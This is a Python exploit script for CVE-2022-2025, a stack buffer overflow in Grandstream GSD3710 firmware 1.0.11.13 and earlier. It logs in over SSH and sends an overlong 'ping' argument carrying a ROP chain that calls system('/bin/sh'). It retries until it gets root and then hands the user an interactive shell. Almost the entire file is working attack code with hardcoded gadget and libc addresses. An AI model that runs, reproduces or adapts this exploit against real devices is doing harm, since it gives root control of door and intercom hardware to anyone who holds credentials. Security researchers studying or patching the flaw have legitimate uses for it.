#!/usr/bin/env python3

# Exploit Title:  Grandstream GSD3710 1.0.11.13 - Stack Overflow 
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025

"""
Author: Jose Luis Verdeguer (@pepeluxx)

Required: Pwntools

Example:

$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""


from struct import pack
import sys
from time import sleep
import argparse
from pwn import *


def get_args():
    parser = argparse.ArgumentParser(
        formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
            prog, max_help_position=50))

    # Add arguments
    parser.add_argument('-i', '--ip', type=str, required=True,
                        help='device IP address', dest="ip")
    parser.add_argument('-u', '--user', type=str, required=True,
                        help='username', dest="user")
    parser.add_argument('-p', '--pass', type=str, required=True,
                        help='password', dest="pwd")

    # Array for all arguments passed to script
    args = parser.parse_args()

    try:
        ip = args.ip
        user = args.user
        pwd = args.pwd

        return ip, user, pwd
    except ValueError:
        exit()
        
def check_badchars(payload):
    for i in range(5, len(payload)):
        if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
            log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
            return True
    return False


def main():
    ip, user, pwd = get_args()

    libc_base = 0x76bb8000
    gadget = libc_base + 0x5952C  # 0x0005952c: pop {r0, r4, pc};
    bin_sh = libc_base + 0xCEA9C  # /bin/sh
    system = libc_base + 0x2C7FD  # 0x0002c7fd  # system@libc
    exit = libc_base + 0x2660C

    print("[*] Libc base: %#x" % libc_base)
    print("[*] ROP gadget: %#x" % gadget)
    print("[*] /bin/sh: %#x" % bin_sh)
    print("[*] system: %#x" % system)
    print("[*] exit: %#x\n" % exit)

    padding = b"A" * 320

    payload = b'ping '
    payload += padding
    payload += p32(gadget)
    payload += p32(bin_sh)
    payload += b"AAAA"
    payload += p32(system)
    payload += p32(exit)

    if check_badchars(payload):
        sys.exit(0)

    count = 1

    while True:
        print('Try: %d' % count)
        s = ssh(user, ip, 22, pwd)
        p = s.shell(tty=False)
        print(p.readuntil(b"GDS3710> "))
        p.sendline(payload)
        p.sendline(b"id")
        sleep(1)
        data = p.read()
        if str(data).find('root') > -1:
            print('PWNED!')
            p.interactive()
            s.close()
            sys.exit()
        s.close()
        count += 1

if __name__ == '__main__':
    main()